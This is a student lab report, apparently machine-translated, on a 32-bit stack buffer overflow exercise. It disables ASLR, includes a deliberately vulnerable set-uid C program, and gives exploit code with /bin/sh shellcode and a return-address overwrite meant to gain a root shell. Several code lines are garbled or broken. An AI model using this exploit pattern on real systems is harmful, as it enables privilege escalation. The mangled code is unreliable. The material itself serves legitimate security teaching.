20165333 Buffer Overflow Vulnerability experiment

20165333 buffer Overflow Vulnerability test one, experimental introduction

A buffer overflow is a scenario in which a program attempts to write to a buffer beyond the pre-allocated fixed-length data. This vulnerability could be exploited by malicious users to alter the flow control of a program, or even execute arbitrary fragments of code. This vulnerability occurs because of a temporary shutdown of the data buffer and the return address, which causes the return address to be rewritten.

II. Preparation of the experiment

In order to facilitate the observation of the assembly statements, we need to operate in a 32-bit environment, so we need to do some preparation before the experiment.
Enter the command to install some packages for compiling a 32-bit C program:

$ sudo apt-get update$ sudo apt-get install -y lib32z1 libc6-dev-i386$ sudo apt-get install -y lib32readline-gplv2-dev

Iii. Experimental Step 3.1 initial Setup

1, Ubuntu and some other Linux systems, using address space randomization to random heap (heap) and stack (stack) initial address, which makes it difficult to guess the correct memory address, and guessing memory address is the key to buffer overflow attack. So in this experiment, we use the following command to turn off this feature:

$ sudo sysctl -w kernel.randomize_va_space=0

2. In addition, in order to further protect against buffer overflow attacks and other attacks using shell programs, many shell programs automatically abandon their privileges when called. Therefore, even if you can trick a set-uid program into invoking a shell, you cannot maintain root privileges in the shell, which is implemented in/bin/bash.

In a Linux system,/bin/sh is actually a symbolic link to/bin/bash or/bin/dash. To reproduce the situation before this protective measure was implemented, we used another shell program (zsh) instead of/bin/bash. The following instructions describe how to set up the ZSH program:

$ sudo su$ cd /bin$ rm sh$ ln -s zsh sh$ exit

3. Enter the command "linux32" into the 32-bit Linux environment.

3.2 principle

In general, a buffer overflow can cause a program to crash, and in the program, the overflow data overwrites the return address. And if the data that overwrites the return address is another address, then the program jumps to that address, and if the address is a piece of well-designed code to implement other functions, this code is shellcode.

Vulnerability procedures

Create a new STACK.C file in the/tmp directory:

$ cd /tmp$ vi stack.c

Write code

/* stack.c *//* This program has a buffer overflow vulnerability. *//* Our task is to exploit this vulnerability */#include <stdlib.h>#include <stdio.h>#include <string.h>int bof(char *str){    char buffer[12];    /* The following statement has a buffer overflow problem */     strcpy(buffer, str);    return 1;}int main(int argc, char **argv){    char str[517];    FILE *badfile;    badfile = fopen("badfile", "r");    fread(str, sizeof(char), 517, badfile);    bof(str);    printf("Returned Properly\n");    return 1;}

Compile the program, and set the Set-uid. The command is as follows:

: The GCC compiler has a stack protection mechanism to prevent buffer overflows, so we need to use –fno-stack-protector to close this mechanism when compiling the code. The-Z execstack is used to allow execution of the stack.

The-g parameter is used to debug a compiled executable document with GDB.

3.4 Attack Program

Our goal is to attack the vulnerability program just now and gain root access through the attack.

Create a new exploit.c file in the/tmp directory and enter the following:

/* EXPLOIT.C *//* A program this creates a file containing code for launching shell*/#include <stdlib.h> #include &lt ;stdio.h> #include <string.h>char shellcode[] = "\x31\xc0"//xorl%eax,%eax "\x50"//PUSHL%eax "\x68 "//sh"//PUSHL $0x68732f2f "\x68" "/bin"//PUSHL $0x6e69622f "\x89\xe3"//movl%esp,%ebx "\x50"//PUSHL% EAX "\x53"//PUSHL%ebx "\x89\xe1"//movl%esp,%ecx "\x99"//CDQ "\xb0\x0b"//movb $0x0b,%al "\xcd\    x80 "//int $0x80; void Main (int argc, char **argv) {char buffer[517];    FILE *badfile;    /* Initialize buffer with 0x90 (NOP instruction) */memset (&buffer, 0x90, 517); /* need to fill the buffer with appropriate contents here */strcpy (buffer, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x?? \x?? \x??   \x?? ");   Four bytes starting at a specific offset of buffer overwrite Sellcode address strcpy (buffer + shellcode); Copy shellcode to buffer with offset set to/* Save the CONtents to the file "badfile" */Badfile = fopen ("./badfile", "w");    fwrite (buffer, 517, 1, badfile); Fclose (badfile);}

Notice the above code, \x?? \x?? \x?? \x?? Need to add shellcode to the address stored in memory because the location can overwrite the return address just after an overflow occurs. and strcpy (Buffer+100,shellcode); This sentence again tells us that the shellcode is saved in buffer + 100 position. Below we will detail how to get the address we need to add.

Now we're going to get shellcode in-memory address, enter the command:

$ gdb stack$ disass main

Results

Continue operation

Note: The result of this attack on the resulting STR address is unsuccessful.
Get the STR address, add the resulting str address and 0x64, calculate the address of Shellcode to 0xff8d87a0 (hex) + 0x64 (100 hex) = 0xff8d8804 (hex

Modify EXPLOIT.C file Now! Will \x?? \x?? \x?? \x?? Modify to \x04\x88\8d\xff

3.5 Attack Results

If the attack succeeds and the "segment error" is indicated, re-use GDB disassembly to compute the memory address.

Iv. Practice

1, follow the experimental steps to operate, attack the vulnerability program and gain root privileges.

2, through the command sudo sysctl-w kernel.randomize_va_space=2 open the system's address space randomization mechanism, repeated use of exploit program to attack the stack program, to observe whether the attack succeeds, can gain root authority.

3, the/bin/sh to/bin/bash (or/bin/dash), to observe whether the attack succeeds, can gain root privileges.

Results

The attack was unsuccessful.

Experimental Thoughts

The experiment was done according to the steps provided by the lab building, and went through the mistakes that occurred because the code accidentally knocked the wrong way. The successful premise of the experiment is to turn off the data overflow protection mechanism, and the attack will not succeed when the overflow protection mechanism is turned on.

20165333 Buffer Overflow Vulnerability experiment